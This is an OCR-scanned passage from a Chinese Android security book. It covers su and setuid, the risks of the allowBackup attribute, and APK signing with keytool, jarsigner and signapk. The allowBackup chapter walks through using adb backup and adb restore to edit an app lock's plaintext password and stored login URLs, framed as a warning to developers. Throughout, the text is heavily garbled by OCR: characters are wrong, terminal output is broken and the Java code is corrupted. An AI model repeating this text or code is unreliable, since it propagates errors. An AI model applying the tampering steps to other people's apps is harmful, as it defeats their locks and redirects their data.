权 处 理 ， 而 su 能 够 降 权 是 因为 它 本 身 提供 了 可 以 修改 uid 的 功能 ， 即 调用 setuid 和 setgid 浆 数 即 可 ， 所 以 在 手机 root 之 后 发 现 还 
是 不 能 调用 系统 的 一 些 API 时 ， 可 以 尝试 使 用 su 来 降 权 进 行 调用 。 


10.6 KEJE 


本 章 知 识 点 有 点 多 ， 一 环 扣 着 一 环 ， 分 析 trun-as 命 令 的 用 法 时 去 分 析 源 码 ， 发 现 错误 的 根源 之 后 ， 引 出 Linux 中 的 setuid 和 
setgid 问 题 ， 解 决 问题 之 后 ， 总 结 了 setuid 和 setgid 的 使 用 场景 ， 然 后 继续 分 析 了 tun-as 命 令 的 作用 。 最 后 也 解决 一 个 问题 ， 即 如 何 
调用 系统 中 那些 有 uid 限 制 的 API， 通 过 一 个 例子 来 解析 问题 ， 引 出 了 Andtoid 中 如 何 执行 jat 文 件 。 


%11% Android 中 的 allowBackup 属 性 


很 多 开发 者 对 Android 关 于 AndroidManifest.xml 中 的 allowBackup 属 性 不 太 了 解 ， 而 开发 者 在 使 用 IDE 工 具 开 发 的 时 候 自 动 生 成 
代码 ， 而 这 个 属性 的 值 会 被 设置 成 ttue， 会 直接 导致 隐私 数据 的 丢失 。 本 章 就 介绍 这 个 属性 对 应 用 安全 的 影响 到 底 有 多 大 以 及 注 


意 事项 。 


11.1 allowBackup 属 性 介绍 


Android API Level 8 及 以 上 Android 系 统 提 供 了 为 应 用 程序 数据 的 备份 和 恢复 功能 ， 此 功能 的 开关 由 应 用 程序 中 
AndroidManifest.xml 文 件 中 的 allowBackup 属 性 值 决 定 ， 其 属性 值 默认 是 true。 当 allowBackup 标 志 为 true 时 ， 用 户 即 可 通过 
аар backup 和 adb restore 命 令 对 应 用 数据 进行 备份 和 恢复 ， 这 可 能 会 市 来 一 定 的 安全 风险 。 


这 个 属性 的 安全 风险 源 于 adb backup 命 令 容许 任何 一 个 能 够 打开 USB 调 试 开关 的 人 从 Android 手 机 中 复制 应 用 数据 到 外 
i, 一旦 应 用 数据 被 备份 之 后 ， 所 有 应 用 数据 都 可 被 用 户 读 取 ; adb restore 容 许 用 户 指定 一 个 恢复 的 数据 来 源 ( 即 备份 的 应 用 
数据 ) 来 恢复 应 用 程序 数据 的 创建 。 因 此 ， 当 一 个 应 用 数据 被 备份 之 后 ， 用 尸 即 可 在 其 他 Android 手 机 或 模拟 器 上 安装 同一 个 应 
用 ， 并 通过 恢复 该 备份 的 应 用 数据 到 该 设备 上 ， 在 该 设备 上 打开 该 应 用 即 可 恢复 到 被 备份 的 应 用 程序 的 状态 。 


尤其 是 通讯 录 应 用 ， 一 旦 应 用 程序 支持 备份 和 恢复 功能 ， 攻 击 者 即 可 通过 adb backup 和 adb restore 命 令 进 行 恢复 新 安装 
的 同一 个 应 用 来 查看 聊天 记录 等 信息 ; 对 于 支付 金融 类 应 用 ， 攻 击 者 可 通过 此 方法 来 进行 恶意 支付 、 盗 取 存 款 等 。 因 此 为 了 安全 
起 见 ， 开 友 者 务必 将 allowBackup 标 志 值 设置 为 false 来 关闭 应 用 程序 的 备份 和 恢复 功能 ， 以 免 造 成 信息 泄露 和 财产 损失 。 


allowBackup 安 全 风险 详情 : 
· alowBackup 风 险 位 置 : AndroidMannifest.xml X #Fandroid: allowBackup 属 性 。 
· alowBackup 风 险 触 发 前 提 条 件 : 未 将 AndroidMannifest.xml 文 件 中 的 android: allowBackup 属 性 值 设 为 false。 


‚ alowBackup 风 险 原 理 : 当 allowBackup 标 志 值 为 trtue 时 ， 即 可 通过 adb backup 和 adb testote 命 令 来 备份 和 恢复 应 用 程序 数据 。 


11.3 STR PX EFI 


可 以 使 用 adb backup 命 令 来 做 一 下 操作 ， 束 是 在 开 友 过 程 中 ， 如 果 遇 到 手机 没有 root 的 ， 但 是 又 想 查 看 沙 金 数据， 那么 这 
个 也 是 一 种 方式 ， 当 然 可 以 使 用 run-as 命 令 来 操作 。 


与 上 面 的 adb backup 命 令 相对 应 的 还 有 一 个 就 是 adb restore 命 令 ， 它 是 用 来 恢复 数据 的 ， 具 体 用 法 : 
aqb restore applock.ab 
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点 击 恢复 数据 即 可 。 现 在 如 果 想 改 了 这 个 应 用 锁 的 密码 ， 直 接 修改 XML 中 密码 数值 ， 如 下 所 示 : 


«string name-"LockPatternCode"»0125«/string» 


然后 再 保 仓 成 ab 文件 进行 还 原 ， 密 码 融 被 修改 了 。 比 如 有 泽 应 用 把 一 些 隐私 的 链接 URL 这 样 的 信息 保存 到 XML 中 ， 残 可 以 
导出 来 数据 ， 然 后 修改 URL 为 自己 的 URL 表 还 原 ， 而 这 些 URL 如 果 是 一 些 上 报 、 或 者 是 登录 的 URL， 束 可 以 在 这 里 做 手脚 ， 达 到 
想 要 的 目的 了 。 
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从 本 章 内 容 可 以 看 到 ， 对 一 个 属性 不 留意 会 带 来 多 大 的 风险 ， 这 个 属性 也 是 很 容易 忽视 的 ， 它 默认 值 是 true， 必 须 手 动 设置 
成 false 才 可 以 。 这 个 属性 导致 现在 市 场 上 很 多 App 都 存在 这 样 的 风险 。 本 章 主要 分 析 了 一 个 应 用 锁 应 用 的 信息 ， 发 现 它 犯 了 一 个 
最 大 的 错误 就 是 把 密码 用 明文 的 方式 保存 在 XML 中 ， 破 解难 度 为 0。 所 以 开发 者 在 开发 一 个 App 的 时 候 ， 不 仅 考 虑 是 用 户 体 验 ， 
而 且 要 对 用 户 的 隐私 负责 。 用 户 在 下 载 和 安装 一 些 Apb 的 时 候 也 需要 多 留 点心。 


第 12 章 ”Android 中 的 和 釜 名 机 制 


Android 开 发 者 对 于 签名 校 验 机 制 应 该 不 陌生 ， 就 是 为 了 安全 ， 不 让 别人 修改 apK， 防 止 恶 意 破解 者 在 反 编 译 apk 之 后 再 重新 安 
装 。 如 果 重 新 安装 系统 会 提示 安装 失败 ， 因 为 apk 的 内 容 发 生疏 变 ， 签 名 结果 不 一 样 ，Android 系 统 中 是 不 允许 安装 同一 个 包 名 但 


是 签名 不 一 样 的 apk 程 序 的 。 


12.1 基本 概念 


在 讲 Android 签 名 之 前 ， 需 要 了 解 几 个 知识 点 : 
` 数据 摘要 (数据 指纹 ) 、 签 名 文件 、 证 书 文件 。 
. jatsign T. KL Afesipnapk Ж. 
: keystore Ж #F#epk8 X £F... x509.pem x fF 63 X Ж 


. 如 何 手动 签名 apk。 


1. 数 据 摘要 


数据 摘要 其 实 也 是 一 种 算法 ， 束 是 对 一 个 数据 源 进行 一 个 算法 操作 之 后 得 到 一 个 摘要 ， 也 书 作 数据 指纹 ， 不 同 的 数据 源 ， 数 
据 指 纹 肯 定 不 一 样 ， 束 和 人 一 样 。 


消息 摘要 算法 (Message Digest Algorithm) 是 一 种 能 产生 特殊 输出 格式 的 算法 ， 其 原理 是 根据 一 定 的 运算 规则 对 原始 数 
据 进 行 某 种 形式 的 信息 提取 ， 提 取出 的 信息 束 称 为 原始 数据 的 数据 摘要 。 


著名 的 数据 摘要 算法 有 RSA 公 司 的 MD5 算 法 和 SHA-1 算 法 及 其 大 量 的 变 体 。 
数据 摘要 的 主要 特点 有 : 


C 无 论 输 入 的 消息 有 多 长 ， 计 算出 来 的 数据 摘要 的 长 度 总 是 固定 的 。 例 如 应 用 MD5 算 法 摘要 的 消息 有 128 位 ， 用 SHA-1 算 法 
摘要 的 消息 最 终 有 160 位 。 


: 一般 来 说 《不 考虑 碰撞 的 情况 下 ) ， 只 要 输入 的 原始 数据 不 同 ， 对 其 进行 摘要 以 后 产生 的 数据 摘要 也 必 不 相同 ， 即 使 原始 
数据 稍 有 改变 ， 输 出 的 数据 摘要 便 完 全 不 同 。 但 是 ， 相 同 的 输入 必 会 产生 相同 的 输出 。 


| 具有 不 可 遂 性 ， 即 只 能 进行 正 向 的 数据 摘要 ， 而 无 法 从 摘要 中 恢复 出 任何 的 原始 消息 。 


2. 釜 名 文件 和 证 书 文件 


签名 文件 和 证 书 文件 是 成 对 出 现 的 ， 二 者 不 可 分 离 ， 而 且 后 面 通过 源码 可 以 看 到， 这 两 个 文件 的 名 字 也 是 一 样 的 ， 只 是 后 绥 
名 不 一 样 。 


数字 签名 要 确保 可 靠 通 信 ， 必 须要 解决 两 个 问题 : 首先 ， 要 确定 消息 的 来 源 确实 是 其 申明 的 那个 人 ; 其 次 ， 要 保证 信息 在 传 
递 的 过 程 中 不 被 第 三 万 鼻 改 ， 即 使 被 鼻 改 了 ， 也 可 以 友 咯 出 来 。 


所 谓 数 字 签 名 ， 束 是 为 了 解决 这 两 个 问题 而 产生 的 ， 它 是 对 前 面 提 到 的 非 对 称 加 密 技术 与 数字 摘要 技术 的 一 个 具体 的 应 用 。 
对 于 消息 的 发 送 者 来 说 ， 先 要 生成 一 对 公私 钥 对 ， 将 公 钥 给 消息 的 接收 者 。 


如 果 消 息 的 友 送 者 有 一 天 想 给 消息 接收 者 友 消 息 ， 在 友 送 的 信息 中 ， 除 了 要 包含 原始 的 消息 外 ， 还 要 加 上 另外 一 段 消息 。 这 
段 消 息 通过 如 下 两 步 生 成 : 


1) 对 要 友人 运 的 原始 消 恩 提取 数据 摘要 。 
2) 对 提取 的 数据 摘要 用 目 己 的 私 钥 加 密 。 
通过 这 两 步 得 出 的 消息 ， 丈 是 所 谓 的 原始 信息 的 数字 签名 。 


而 对 于 信息 的 接收 者 来 说 ， 他 所 收 到 的 信息 ， 将 包含 两 个 部 分 ,一 是 原始 的 消息 内 容 ， 二 是 附加 的 那 段 数字 签名 。 他 将 通过 
以 下 三 步 来 验证 消息 的 真 伪 : 


1) 对 原始 消息 部 分 提取 数据 摘要 ， 注 意 这 里 使 用 的 数据 摘要 算法 要 和 友 送 方 使 用 的 一 致 。 
2) 对 附加 上 的 那 段 数字 签名 ， 使 用 预先 得 到 的 公 钥 解密 。 


3) 比较 前 两 步 所 得 到 的 两 段 消息 是 否 一 致 。 如 果 一 致 ， 则 表明 消息 确实 是 期 望 的 帮 送 者 友 的 ， 且 内 容 没 有 被 纂 改过 ; 相 
反 ， 如 果 不 一 致 ， 则 表明 传送 的 过 程 中 一 定 出 了 问题 ， 消 息 不 可 信 。 


这 种 数字 答 名 近 术 确实 可 以 有 效 解决 可 靠 通信 的 问题 。 如 果 原 始 消 息 在 传送 的 过 程 中 被 修改 了 ， 那 么 在 消息 接收 者 那里 ， 对 
羽 复 改 的 消息 提取 的 摘要 肯定 和 原始 的 不 一 样 。 并 且 ， 由 于 复 改 者 没有 消息 友 送 方 的 私 铀 ， 即 使 他 可 以 重新 算出 家 修改 消息 的 摘 
要 ， 也 不 能 伪造 出 数字 签名 。 


绪 上 所 述 ， 数 字 签 名 其 实 束 是 只 有 信息 的 友 送 者 才能 产生 的 别人 无 法 伪造 的 一 段 数字 捉 ， 这 上段 数字 捉 同 时 也 是 对 信息 的 友 送 
者 友 送 信息 真实 性 的 一 个 有 效 证 明 。 


不 知道 大 家 有 没有 注意 ， 前 面 讲 的 这 种 数字 签名 方法 ， 有 一 个 前 提 ， 丈 是 消息 的 接收 者 必须 要 事先 得 到 正确 的 公 钥 。 如 果 一 
开始 公 钥 束 补 别人 算 改 了 ， 那 坏人 束 会 被 你 当成 好 人 ， 而 真正 的 消息 友 送 者 给 你 友 的 消息 会 被 你 视 作 无 效 的 。 而 且 ， 很 多 时 候 根 
本 就 不 具备 事先 沟通 公 钥 的 信息 通道 。 那 么 如 何 保证 公 钥 的 安全 可 信 呢 ?这 就 要 靠 数字 证 书 来 解决 了 。 


数字 证 书 一 般 包 含 以 下 一 些 内 容 : 
- 证 书 的 发 布 机 构 (Issuer) 
证 书 的 有 效 期 (Validity) 


.证书 所 有 者 (Subject) 


. 数字 签名 所 使 用 的 算法 
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可 以 看 出 ， 数 字 证 书 其 实 也 用 到 了 数字 签名 技术 。 只 不 过 要 签名 的 内 容 是 消息 友 送 方 的 公 钥 ， 以 及 一 些 其 他 信息 。 但 与 普通 
数字 签名 不 同 的 是 ， 数 字 证 书 中 签名 者 不 是 随 随便 便 一 个 普通 的 机 构 ， 而 是 要 有 一 定 公 信 力 的 机 构 。 这 束 好 像 你 的 大 学 毕业 证 书 
上 签名 的 一 般 都 是 德高望重 的 校长 一 样 。 一 般 来 吕 ， 这 些 有 公信 力 机 构 的 根 证 书 已 经 在 设备 出 厂 前 预先 安 准 到 了 你 的 设备 上 了 ，。 
所 以 ， 数 字 证 书 可 以 保证 数字 证 书 里 的 公 钥 确实 是 这 个 证 书 的 所 有 者 的 ， 或 者 证 书 可 以 用 来 确认 对 方 的 身份 。 数 字 证 书 主 要 是 用 
来 解决 公 钥 的 安全 及 放 问 题 。 


绪 上 所 述 ， 忌 结 一 下 ， 数 字 签 名 和 签名 验证 的 大 体 流程 如 图 12-1 所 示 。 
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3.jarsign 和 signapk 工 具 


了 解 到 完了 签名 中 的 三 个 文件 的 知识 点 之 后 ， 下 面 继 续 来 看 Android 中 签名 的 两 个 工具 : jarsign 和 signapk 


开始 使 用 这 两 个 工具 很 容易 混淆 ， 它 们 到 底 有 什么 区 别 吗 ?其实 这 两 个 工具 很 好 理解 ，jarsign 是 jdk 本 身 目 市 的 一 个 工具 ， 
它 可 以 对 jar 进 行 签名 。 而 signapk 是 后 面 专门 为 了 Android 应 用 程序 apk 进 行 签名 的 工具 ， 它 们 的 签名 算法 没什么 区 别 ， 主 要 是 


签名 时 使 用 的 文件 不 一 样 。 
4.keystore 文 件 和 pk8、x509.pem 文 件 的 区 别 
上 面 了 解 到 了 jarsign 和 signapk 两 个 工具 都 可 以 进行 Android 中 的 签名 ， 那 么 它们 的 区 别 在 于 签名 时 使 用 的 文件 不 一 样 : 
jarsign 工 具 签 名 时 使 用 的 是 keystore 文 件 。 
signapk 工 具 签 名 时 使 用 的 是 pk8、x509.pem 文 件 。 


在 使 用 Eclipse 工具 编写 程序 出 debug 包 的 时 候 ， 黑 认 用 的 是 jarsign 工 具 进 行 等 名 的 ， 而 且 Eclipse 中 有 一 个 黑 认 签名 文件 ， 
如 图 12-2 所 示 。 
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type filter text 
> General 
4 Android 
Build 
DDMS 
Editors 
Launch 
Lint Error Checking @ Silent 
' LogCat © Normal 


Build Settings: 

[4| Automatically refresh Resources and Assets folder on build 

Force error when external Jars contain native libraries 

Skip packaging and dexing until export or launch. (Speeds up automatic builds on file save) 
Build output 


Usage Stats (2 Verbose 
> C/C++ 
Fat Jar Preferences 
> Help MDS fingerprint: 90:99:63:B4:0A:23:E3:DA:08:00:85:96:CA:2A:89;F5 
> [nstall/Update 


Default debug keystore: 


SHA1 fingerprint: D5:/8:AE:52:4D:6C:68:28:B 7:90:4B:59:11:08:86:22:83:32:4C:34 


> Java 
> Run/Debug 


MDS fingerprint: 


> Team 
> XML SHA1 fingerprint: 


Restore Defaults 


图 12-2 Eclipse 中 默认 签名 文件 


有 上 默认 签名 的 keystore 文 件 ， 当 然 也 可 以 选择 指定 的 keystore 文 件 。 看 到 上 面 有 MD5 和 SHA1 的 摘要 ， 这 个 就 是 keystore 文 
件 中 私 钥 的 数据 摘要 ， 这 个 信息 也 是 在 申请 很 多 开发 平台 账号 的 时 候 需 要 填 入 的 信息 ， 比 如 申请 百度 地 图 、 微 信 SDK 等 ， 会 需 
填写 应 用 的 MD5 或 者 SHA1 信 息 。 


5. 手 动 签名 apk 包 


(1) 使 用 keytool 和 jarsigner 来 进行 签名 


当然 ， 在 正式 签名 处 release 包 的 时 候 ， 需 要 创建 一 个 自己 的 keystore 文 件 ， 如 图 12-3 和 图 12-4 所 示 。 
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Run As h | SERT 
Export Unsigned Application Package... 
Debug As h 
Profile As ; Display dex bytecode 
+ | Build Fat Jar Rename Application Package 
Team : Add Support Library... 
боша МА Я Fix Project Properties 
Restore from Local History... Run Lint: Check for Common Errors 


Android Tools Ë Clear Lint Markers 


图 12-3 ”导出 签名 apk 


Q Export Android Application 


Keystore selection 


Єў Enter path to keystore. 


(à! Use existing keystore 


(С) Create new keystore 
Location: 
Password: 


Confirm: . 
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这 里 可 以 对 keystore 文 件 起 自己 的 名 字 ， 而 且 后 缀 名 也 是 无 天 紧要 的 。 创 建 完 文件 之 后 ， 也 会 生成 MD5 和 SHA1 值 ， 这 个 值 
可 以 不 用 记录 的 ， 可 以 通过 命令 查看 keystore 文 件 的 MD5 和 SHA1 的 值 : keytool-list-keystore debug.keystore， 如 下 所 示 : 


jiangweil-g8jiangweil-g-D1 /cygdrive/d 
S keytool -list -keystore debug.keystore 
输入 密 钥 库 口令 : 


大 大 大 大大 大 大 大 大 大 大 大 大 大 大 大 大 WARNING WARNING WARNING 炎炎 类 炎炎 炎炎 火炎 类 炎炎 火炎 火炎 类 
* 存储 在 您 的 密 钥 库 中 的 信息 的 完整 性 * 

* 尚未 经 过 验证 ! 为 了 验证 其 完整 性 ，* 

* AED Wy EU. * 

k Ku K uk Ku K K KK ik S.S.K. WARNING WARNING WARNING 大 大 大 大 大 大 大 大 大 大 大 大 大 大 大 大 大 


密 钥 库 类 型 : JKS 
密 钥 库 提供 方 : SUN 


您 的 密 钥 库 包含 1 个 条 目 


androiddebugkey, 2014-6-11, PrivateKeyEntry, 
证 书 指纹 (SHA1): 4D:9B:98:41:8B:87:3F:68:40:ED:AC:28:16:EB:A7:81:9D:BA:2A:C5 


jiangweil-g8jiangweil-g-D1 /cygdrive/d 


这 里 看 到 用 Eclipse 自动 签名 和 人 生成 一 个 keystore 文 件 ， 也 可 以 使 用 keytool 工 具 生 成 一 个 keystore 文 件 。 这 个 方法 网 上 有 ， 
就 不 做 太 多 的 介绍 了 。 然 后 可 以 使 用 arsign 来 对 apk 包 进行 签名 了 。 可 以 手动 生成 一 个 keystore 文 件 : 


keytool -genkeypair -v -keyalg DSA -keysize 1024 -sigalg SHAlwithDSA -validity 
20000 -keystore D:\jiangwei.keystore -alias jiangwei -keypass jiangwei 
-storepass jiangwei 


jiangweil-g@jiangweil-g-D1 /cygdrive/d 
S keytool -genkeypair -v -keyalg DSA -keysize 1024 -sigalg SHAlwithDSA -validity 
20000 
torepass jiangwei 
您 的 名 字 与 姓氏 是 什么 ? 
[Unknown]: СМ 
您 的 组 织 单位 名 称 是 什么 ? 
[Unknown]: СМ 
您 的 组 织 名 称 是 什么 ? 
[Unknown]: СМ 
您 所 在 的 城市 或 区 域名 称 是 什么 ? 
[Unknown]: СМ 
您 所 在 的 省 / 市 / 自治 区 名 称 是 什么 ? 
[Unknown]: СМ 
该 单位 的 双 字 母国 家 / 地 区 代码 是 什么 ? 
[Unknown]: СМ 
CN=CM, OU=CM, O=CM, L=CM, ST=CM, C=CM 是 否 正确 ? 
[LE]: y 


正在 为 以 下 对 象 生 成 1,024 位 DSA 密 钥 对 和 自 签名 证 书 (SHAlwithDSA) ( 有 效 期 为 20,000 X): 
CNSCM, OUZCM, О=СМ, L=CM, S'P=CM, C=CM 
[ 正在 存储 D: jiangwei.keystore] 


jiangweil-gGjiangweil-g-D1 /cygdrive/d 


这 个 命令 有 操 长 ， 有 几 个 重要 的 参数 需要 说 明 : 


-alias 是 定义 别名 ， 这 里 是 debug。 


· -keyalg 是 规定 签名 算法 ， 这 里 是 DSA， 这 里 的 算法 直接 关系 到 后 面 apk 中 签名 文件 的 后 缓 名 ， 到 后 面 会 详细 说 明 。 


再 用 jarsigner 工 具 进行 签名 ， 如 下 所 示 : 


Jarsigner -verbose -sigalg SHAlwithDSA -digestalg SHA1 -keystore D:'jiangwei. 
keystore -storepass jiangwei D:'123.apk jiangwei 


D:N^keytool -genkeypair -v -keyalg DSñ -keysize 1024 -sigalg SHfüíivithDSÓü -validity 20088 -keystore D:Mjiangvei.keystore -alias jiangwei -keypass jiangvei -storepass jiangwei 
您 的 名 字 与 姓氏 是 什么 ? 
[Unknown]: ХХ 
您 的 组 织 单位 名 МЕТА ? 
[Unknoun 1: 
您 的 组 织 名 称 是 什 Z? 
[Unknoun 1: 


ENTERS TA A 


[Unknown 1: 


您 所 在 的 省 zm 8; 治 区 名 称 是 什么 ? 
这 单位 前 戏 字号 国 家 /地 区 代码 是 什么 ? 


[Unknown 1: 


CN-44, OU-XM, cà -4X, L-X3, ST-X3, C-E GEM? 
SE y 


正在 为 以 下 对 象 生 成 1.024 位 DSn 密 钥 对 和 自 签名 证 书 〈SHnatwithDSsh> 89) 20.000 X: 


СМ=ХХ, 0U=XX。 О=ХХ, Ь=ХХ, $Т=ХЯ, C=XX 
[正在 存储 D: \jiangwei.keystore ] 


这 样 就 成 功 地 对 apk 进 行 签 名 了 。 
签名 的 过 程 中 直到 的 间 题 : 


1) 证 书 链 找 不 到 的 问题 ， 如 下 所 示 : 


D:*»jarsigner -verbose -sigalg SHAiwithDSA —digestalg SHAI -keystore D:\simonh.keystore -storepass simonh D:*123.apk debugi 


jarsigner: } F]debu1 ЈЕ. debugi4J52/5|FH ® A TB ZHAFRAN AEE PNA ЕНЕ ЕАН . 


这 是 因为 最 后 一 个 参数 alias 是 keystore 的 别名 输 错 了 


2) 生成 keystore 文 件 的 时 候 提示 密码 错误 ， 如 下 所 示 : 


р: \>keytool —genkeu -uv -keyalg DSA -keysize 1024 -sigalg SHAiwithDSA -validity 200008 -keystore D:Sdebug.keustore -alias simon -keypass simonh -storepass simonh 
keytool Hi: java.io.IOException: Keystore was tampered with, or password vas incorrect 
java.io.IOException: Keuystore vas tampered with, or password vas incorrect 

at sun.security.prouider.JavaKeyStore.engineLoad(JavaKe yStore.;java:7725 

at sun.security.prouvider.JavakKeyStore$JKS .engineLoadC(JavaKe yStore.;jaua:55) 

at java.security.KeyStore.load(KeyStore.java:12145 

at sun.security.tools.KeyTool.doComnmandsCKe yTool. java: 7895 

at sun.security.tools.KeyTool.runCKeyTool.java:348» 

at sun.security.tools.KeyTool.mainCXKeyTool.java:333)5 
Caused by: java.security.UnrecoverableKeyException: Password verification failed 

at sun.security.provider.JavaKeyStore.engineLoad(JavaKeyStore.java:778»5 

. 5 more 


这 个 原因 是 因为 在 当前 目录 已 经 有 debug.ketystore 了 ， 再 生成 一 个 debug.keystore 的 话 ， 就 会 报错 。 


3) 找 不 到 别名 的 问题 ， 如 下 所 示 : 


D:N2jarsigner -verbose -sigalg SHñiuithDSñ -digestalg SHAI -keystore D:\lebug.keystore -storepass jiangwei D:*123.apk debug 


请 指定 别名 
请 键入 jarsigner -help 以 了 解 用 法 


这 个 问题 的 原因 是 使 用 keytool 生 成 Keystore 的 时 候 ， 起 了 debug 的 别名 ， 这 个 问题 困扰 了 我 很 久 ， 最 后 做 了 很 多 例子 才 发 
现 的 ， 只 要 keystore 文 件 的 别名 是 debug 的 话 ， 就 会 报 这 样 的 错误 。 这 个 应 该 和 系统 默认 的 签名 debug.keystore 中 的 别名 是 
debug 有 关系 。 


注意 : Android 中 是 允许 使 用 多 个 keystore 对 apk 进 行 签名 的 ， 这 里 就 不 再 粘贴 命令 了 ， 创 建 了 几 个 keystore 对 apk 进 行 签名 ， 如 
图 12-5 所 示 。 


123 k META-INF 


=ч "m ite w pir 


2 客 称 - 修改 日 期 s= A 
Е DEBUG1.DSA 2015/12/25 13:26 DSA 文件 1KB 
| | DEBUGI.SF 2015/12/25 13:26 SF 文件 1 KB 
E Е JIANGWELDSA 2015/12/25 13:22 DSA 文件 1 КВ 
| | JIANGWELSF 2015/12/25 13:22 — SF 文件 1KB 
|.] MANIFEST.MF 2015/12/25 12:57 МЕЗ 1 KB 
Е SIMON.DSA 2015/12/25 13:05 DSA 文件 1 KB 
à | |] SIMON.SF 2015/12/25 13:05 — SF 文件 1 КВ 
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这 里 把 签名 之 后 的 apk 进 行 解压 之 后 ， 友 现 有 三 个 签名 文件 和 证 书 (.SF/.DSA) 。 也 可 以 注意 到 ， 答 名 时 用 的 是 DSA 算 法 ， 
这 里 的 文件 后 经 名 丈 是 DSA， 而 且 文 件 名 是 keystore 的 别名 ， 这 里 算是 理 清 了 如 何 使 用 keytool| 产 生 keystore， 以 及 用 jarsigner 
来 进行 签名 。 


(2) 用 signapk 来 进行 签名 
下 面 骨 来 看 看 signapk 工 具 进 行 签名 : 


java -jar signapk.jar .testkey.x509.pem testkey.pk8 debug.apk debug.sig.apk 


这 里 需要 两 个 文件 .pk8 和 .x509.pem : 
| bk8 是 私 钥 文件 。 
‚ X509.pem 是 含有 公 钾 的 文件 。 


需要 注意 的 是 : signapk 签 名 之 后 的 apk，META-INF 文 件 夹 中 的 三 个 文件 的 名 字 ， 如 图 12-6 所 示 。 


SignApkDemo tmp к META-INF = 


НЕ + 新 建文 件 去 


名 称 修改 日 期 sem 大 小 
| | CERT.RSA 2015/12/15 15:34 RSA Xt 2 KB 
| | CERT.SF 2015/12/15 15:34 БЕУ 27 КВ 
| | MANIFEST.MF 2015/12/15 15:34 — MF xt 27 КВ 


图 12-6 ”签名 文件 


因为 signapk 在 前 面 的 时 候 不 像 jarsigner 会 目 动 使 用 别名 来 命名 文件 ， 融 是 写 死 了 是 CERT 的 名 字 ， 不 过 文件 名 不 影响 的 ， 
后 面 分 析 Android 中 的 apk 校 验 过 程 中 会 说 道 ， 只 会 通过 后 缀 名 来 查找 文件 。 


(3) 两 种 的 签名 万 式 有 什么 区 别 


jarsigner 签 名 时 用 的 是 keystore 文 件 ，signapk 签 名 时 用 的 是 pk8 和 x509.pem 文 件 ， 而 且 都 是 给 apk 进 行 签 名 的 ， 那 么 
keystore 文 件 和 pk8、x509.pem 之 间 是 不 是 有 什么 联系 呢 ? 答案 是 肯定 的 ， 网 上 搜 了 一 下 ， 果 然 它们 之 间 是 可 以 转化 的 ， 这 里 


就 不 青 分 析 如 何 进行 转化 的 ， 网 上 的 例子 很 多 ， 有 专门 的 工具 可 以 进行 转化 。 


12.2 Android 中 签名 流程 

下 面 开 始 从 源码 中 去 分 析 Android 中 的 签名 机 制 和 原理 流程 。 因 为 网 上 没有 找到 jarsigner 的 源码 ， 但 是 找到 了 signapk 的 源 
码 ， 下 面 残 来 看 看 signapk 的 源码 : 源码 位 置 是 com/android/signapk/sign.java。 

通过 上 面 的 签名 可 以 看 到 ，Android 签 名 apk 之 后 ， 会 有 一 个 META-INF 目 录 ， 这 里 有 三 个 文件 : 

- MANIFEST.MF 

- CERT.SF 

- CERT.RSA 

下 面 来 看 看 这 三 个 文件 到 底 是 干 哈 的 。 


1.MANIFEST.MF 文 件 


这 个 文件 主要 包括 apk 文 件 中 所 有 文件 的 数据 摘要 内 容 ， 如 下 所 示 : 


Manifest-Version: 1.0 
Created-By: 1.0 (Android) 


Name: res/drawable-xhdpi-v4/ic launcher.png 
SHA1-Digest: AfPh30JoypH966Mlud5W6f£lRHg4= 


Name: AndroidManifest.xml 
SHA1-Digest: NatvxDVfVghUpzHv64/XlaaJUnU= 


о CO J ашты Q мины 


10 Name: res/drawable/yw 1222 0335.jpg 
11  SHA1-Digest: dzMGjMx3ceqbS8eP5XdfiurM4MfO0- 


13 Name: res/drawable-hdpi-v4/ic launcher.png 
14  SHAl-Digest: Nq8q3HeTluE5JNCBpVvNy3BXtJI- 


16 Name: res/layout/activity main.xml 
17  SHA1l-Digest: mPAYi-c-9sKduSKDiNS5TTMu-*tEZ9A- 


19 Name: resources.arsc 
20 SHA1-Digest: itX8Yw-d5hbMHIhZe6/oKel92wY- 


22 Name: res/drawable-mdpi-v4/ic launcher.png 
23  SHA1l-Digest: RRxOSvpmhVfCwiprVV/wZlaqQpw- 


25 Name: res/drawable/ic launcher.png 
26  SHA1l-Digest: IIKZ7xJBfZ49yxDbSddDXQHz65I- 


28 Name: classes.dex 
29  SHA1l-Digest: uWnlIDOuHVpw2dvtQbfG29VvVms- 


31 Name: lib/armeabi/libsgmain.so 
32  SHA1-Digest: 7cB4/7jbHIwNEnvTk2YFzilWp-4s- 


34 Name: res/drawable-xxhdpi-v4/ic launcher.png 
35  SHAl-Digest: GVIfdEOBv4gEny2T1jDhGGsZOBo- 


下 面 来 看 看 源码 : 


public static void main(String[] args) { 


if 


(args.length != 4) { 
System.err.println("Usage: signapk " + 


"publickey.x509[.pem] privatekey.pk8 " + 
"Lpput Tam output. Tar"); 
System.exit(2); 


JarFile inputJar = null; 
JarOutputStream outputJar = null; 


try { 


X509Certificate publicKey = readPublicKey (new File(args[0])); 
// Assume the certificate is valid for at least an hour. 
long timestamp = publicKey.getNotBefore().getTime() + 3600L * 1000; 


PrivateKey privateKey - readPrivateKey (new File(args[1])); 


inputJar = new JarFile(new File(args[2]), false); // Don't verify. 
outputJar - new JarOutputStream(new FileOutputStream(args[3])); 


outputJar.setLevel(9); 


JarEntry je; 


// MANIFEST.MF 


Manifest manifest = addDigestsToManifest(inputJar); 
je = new JarEntry (JarFile.MANIFEST NAME); 
je.setTime(timestamp); 

outputJar.putNextEntry(je); 
manifest.write(outputJar); 


// CERT.SF 
Signature signature = Signature.getInstance("SHAlwithRSA"); 
signature.initSign(privateKey); 
je = new JarEntry (CERT SF МАМЕ); 
je.setTime(timestamp); 
outputJar.putNextEntry(je); 
writeSignatureFile(manifest, 
new SignatureOutputStream(outputJar, signature)); 


// CERT.RSA 

je = new JarEntry (CERT RSA, NAME); 
je.setTime(timestamp); 

outputJar.putNextEntry (је); 
writeSignatureBlock(signature, publicKey, outputJar); 


// Everything else 

copyFiles(manifest, inputJar, outputJar, timestamp); 
) catch (Exception e) { 

e.printStackTrace(); 

System.exit(1); 


) finally ( 
try ( 
if (inputJar !- null) inputJar.close(); 
if (outputJar != null) outputJar.close(); 


) catch (IOException e) ( 
e.printStackTrace(); 
System.exit(1); 


Emain, sess AU AS, ЕЕ MANIFEST. МЕЗ {+ ЛЖ: 


/ /MANIFEST .MF 

Manifest manifest = addDigestsToManifest (inputJar); 
je = new JarEntry(JarFile.MANIFEST NAME); 
je.setTime (timestamp); 

outputJar.putNextEntry(je); 


进入 方法 manifest.write (outputJar) : 


